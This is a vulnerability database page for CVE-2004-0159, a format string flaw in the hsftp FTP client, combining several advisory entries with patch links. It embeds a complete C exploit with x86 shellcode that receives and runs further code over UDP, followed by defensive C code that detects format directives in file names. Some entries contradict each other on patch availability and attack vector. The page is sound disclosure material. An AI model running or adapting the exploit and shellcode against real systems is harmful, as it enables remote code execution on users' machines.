CVE-2004-0159
CVSS 7.5
Published: 2004-03-15 00:00:00
Revised: 2016-10-17 22:41:17

[Original] Format string vulnerability in hsftp 1.11 allows remote authenticated users to cause a denial of service and possibly execute arbitrary code via file names containing format string characters that are not properly handled when executing an "ls" command.


[CNNVD] Samhain Labs HSFTP Remote Format String Handling Vulnerability (CNNVD-200403-076)

        
        hsftp is an FTP client program.
        hsftp lacks proper handling of special file names. A remote attacker can exploit this to mount a format string attack against the hsftp program and possibly execute arbitrary commands with the privileges of the hsftp process.
        The attacker can create a file with a specially crafted name containing format directives on a remote FTP server; when hsftp connects and lists the directory, memory can be overwritten, and carefully constructed file name data may execute arbitrary commands with the privileges of the hsftp process.
        

- CVSS (Base Score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (Affected Platforms and Products)

cpe:/a:samhain_labs:hsftp:1.10
cpe:/a:samhain_labs:hsftp:1.11
cpe:/a:samhain_labs:hsftp:1.4
cpe:/a:samhain_labs:hsftp:1.7
cpe:/a:samhain_labs:hsftp:1.5
cpe:/a:samhain_labs:hsftp:1.6
cpe:/a:samhain_labs:hsftp:1.9

- OVAL (Technical Details for Detection)

No related OVAL definitions found

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0159
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0159
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200403-076
(official data source) CNNVD

- Other Links and Resources

http://lists.grok.org.uk/pipermail/full-disclosure/2004-February/017737.html
(UNKNOWN)  FULLDISC  20040223 Re: [SECURITY] [DSA 447-1] New hsftp packages fix format string vulnerability
http://marc.info/?l=bugtraq&m=107755803218677&w=2
(UNKNOWN)  DEBIAN  DSA-447
http://www.securityfocus.com/bid/9715
(VENDOR_ADVISORY)  BID  9715
http://xforce.iss.net/xforce/xfdb/15276
(VENDOR_ADVISORY)  XF  hsftp-format-string(15276)

- Vulnerability Information

Samhain Labs HSFTP Remote Format String Handling Vulnerability
High risk; Input validation
2004-03-15 00:00:00 2005-10-12 00:00:00
Local
        
        

- Advisories and Patches

        Temporary workaround:
        If you cannot install the patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
        * Ulf Harnhammar provides the following patch:

        http://www.securityfocus.com/data/vulnerabilities/patches/hsftp.patch

        Vendor patches:
        Debian
        ------

        http://www.debian.org/security/2004/dsa-447

- Vulnerability Information (23740)

Samhain Labs 1.x HSFTP Remote Format String Vulnerability (EDBID:23740)
linux local
2004-02-23 Verified
0 priest@priestmaster.org
N/A
source: http://www.securityfocus.com/bid/9715/info

hsftp has been found to be prone to a remote format string vulnerability. This issue is due to the application's improper use of a format printing function.

Ultimately this vulnerability could allow for execution of arbitrary code on the system implementing the affected software, which would occur in the security context of the server process.

// priestmasters hsftp <=1.11 remote format string exploit
// mail: priest@priestmaster.org
// url: http://www.priestmaster.org
// I know, it does not have any command line parameters (I use #define AAA).
// I do not calculate the values for the format string and so on,
// but it works if you follow the steps in the README file.
// This exploit is very ugly, but I'm very busy. Sorry.

#include <stdio.h>
#include <string.h>		// memset, memcpy, strlen

#define PORT    "\x34\x12"		// Udp port 13330
					// You can use other ports,
					// if you want.

// Change it with your values
#define FPUTCGOT	0x0804e1dc	// Got of fputc
#define RETADDR		0xbffff660	// return address
#define PADDING		0		
#define STACKPOP	10
#define FMTNUM1		60000		// First number for short write
#define FMTNUM2		50000		// Second number for short write

// This works only with hsftp 1.11 SUSE 7.0 compiled from source.
/* #define FPUTCGOT	0x0804e1dc	// deregister frame pointer 
					// GOT, dtor are also possible
#define RETADDR		0xbffff660	// Shellcode location

#define PADDING		0		// Padding
#define STACKPOP	10		// How many %x needed

#define FMTNUM1		62864
#define FMTNUM2		51615 */

////////////////////////////////////////////////////////////////////////////

#define NOP		'G'
#define DUMMY		'A'
#define NOPSPACE	140

/**
 ** Linux/x86 udp + read + exec shellcode (c) gunzip
 **
 ** reads from udp port 13330 another shellcode then executes it
 **
 ** 1. Udp is usually not filtered
 ** 2. You can send very big shellcode (size <= 65535)
 ** 3. It's shorter than any tcp bind-shellcode (just 60 bytes)
 ** 4. Your sent shellcodes can contain any char ( 0x00 too )
 ** 5. You can send a whole shell script to execute with a command code
 ** 6. Does not contain CR, LF, spaces, slashes and so on
 ** 7. No need to search for file descriptors
 **
 ** gunzip@ircnet <techieone@softhome.net>
 ** http://members.xoom.it/gunzip
**/

char shellcode[]=
        "\x31\xc0\x31\xdb\x43\x50\x6a\x02\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
        "\x4b\x53\x53\x53\x66\x68" PORT "\x66\x6a\x02\x89\xe1\x6a\x16\x51"
        "\x50\x89\xe1\xb3\x02\x6a\x66\x58\xcd\x80\x8b\x1c\x24\x99\x66\xba"
        "\xff\xff\x29\xd4\x89\xe1\xb0\x03\xcd\x80\xff\xe1";


int main(void)
{
	char xplbuf[BUFSIZ];	// Our exploit buffer
	char *p = xplbuf;	// Our exploit pointer

	// Null terminate the string
	memset(p, 0x00, BUFSIZ);

	// Make the padding:
	memset(p, DUMMY, PADDING);
	p += PADDING;

	// Copy the return Address with Junk to xplbuf
	*((void **)p) = (void *) FPUTCGOT;
	p += 4;
	*((void **)p) = (void *)(FPUTCGOT + 2);	// Upper half of the GOT entry
	p += 4;

	// Create the nops
	memset(p, NOP, NOPSPACE);
	p += NOPSPACE;

	// Copy shellcode
	memcpy(p, shellcode, strlen(shellcode));
	p += strlen(shellcode);

	// Create format string
	sprintf(p, "%%%dx%%%d$hn%%%dx%%%d$hn", FMTNUM1, STACKPOP, FMTNUM2, STACKPOP+1);
	
	// Print the whole string
	printf("%s", xplbuf);
	return 0;
}
		

- Vulnerability Information

4029
Hsftp Filename Format String
Local Access Required, Remote / Network Access, Local / Remote, Context Dependent Input Manipulation
Loss of Confidentiality, Loss of Integrity

- Vulnerability Description

Hsftp contains a flaw that may allow a malicious user to execute arbitrary code on the client machine. The issue is triggered when the client user lists the contents of a directory which contains a maliciously crafted filename. It is possible that the flaw may allow execution of arbitrary code resulting in a loss of confidentiality and integrity.
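As an added defensive illustration, not code from this page's exploit or from hsftp itself: the C below shows the fix for this bug class (a server-supplied file name is printed as data, never as the format string) next to a small scanner that flags directory entries carrying printf conversions, counting "%n" separately because that is the directive a format string write depends on. The file names in main are constructed samples.

```c
#include <stdio.h>
#include <string.h>

/* Count printf-style conversions in an untrusted string such as a server-
 * supplied file name ("%%" is a literal and not counted).  n_writes, if
 * non-NULL, receives the number of "%n", the memory-write primitive behind
 * format string attacks.  Non-zero means: never use this string as a format. */
int count_conversions(const char *s, int *n_writes)
{
    int total = 0, writes = 0;
    for (const char *p = s; *p != '\0'; p++) {
        if (*p != '%')
            continue;
        if (*++p == '%')                   /* "%%" prints a literal '%' */
            continue;
        while (*p != '\0' && strchr("-+ #0123456789.*$hlLqjzt", *p) != NULL)
            p++;                           /* flags, width, precision, '$', length */
        if (*p == '\0')
            break;                         /* dangling '%' ends the name */
        total++;
        if (*p == 'n')
            writes++;
    }
    if (n_writes != NULL)
        *n_writes = writes;
    return total;
}

/* Number of "%n" directives only, the ones that can corrupt memory. */
int count_write_conversions(const char *s) { int w = 0; count_conversions(s, &w); return w; }

/* The fix for this bug class: the name is data, never the format string.
 * Vulnerable: printf(name);  safe: fputs(name, out) or printf("%s", name). */
void print_name_safe(FILE *out, const char *name)
{
    fputs(name, out);
    fputc('\n', out);
}

int main(void)
{   /* constructed listing; the last two names mimic a hostile server */
    const char *listing[] = { "notes.txt", "100%%done.log", "%08x%08x%hn", "report%n.txt" };
    for (size_t i = 0; i < sizeof listing / sizeof listing[0]; i++) {
        FILE *out = count_conversions(listing[i], NULL) > 0 ? stderr : stdout;
        print_name_safe(out, listing[i]);  /* suspect names still print safely */
    }
    return 0;
}
```

A client can run count_conversions over each entry before display to log or reject names that carry conversions, while print_name_safe removes the bug regardless of what the server sends.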

- Timeline

2004-02-23 Unknown
Unknown Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue. Users of Hsftp 1.14 are counseled to connect only to trusted servers.

- Related References

- Vulnerability Author

- Vulnerability Information

Samhain Labs HSFTP Remote Format String Vulnerability
Input Validation Error 9715
No Yes
2004-02-23 12:00:00 2009-07-12 03:06:00
Discovery of this issue has been credited to Ulf Harnhammar.

- Affected Program Versions

Samhain Labs hsftp 1.14
Samhain Labs hsftp 1.13
Samhain Labs hsftp 1.11
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
+ Mandriva Linux Mandrake 9.2 amd64
+ Mandriva Linux Mandrake 9.2
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
Samhain Labs hsftp 1.10
Samhain Labs hsftp 1.9
Samhain Labs hsftp 1.7
Samhain Labs hsftp 1.6
Samhain Labs hsftp 1.5
Samhain Labs hsftp 1.4
hsftp hsftp 1.14
hsftp hsftp 1.13
hsftp hsftp 1.11
hsftp hsftp 1.10
hsftp hsftp 1.9
hsftp hsftp 1.7
hsftp hsftp 1.6
hsftp hsftp 1.5
hsftp hsftp 1.4

- Vulnerability Discussion


- Exploit

Exploit code has been provided by priestmaster <priest@priestmaster.org>.

- Solution

The vendor has reportedly addressed this issue in the upstream version 1.14.

Debian has released advisory DSA 447-1 dealing with this issue. Please see the reference section for more details.

Fixes:

Samhain Labs hsftp 1.11
hsftp hsftp 1.11

- Related References

 

 
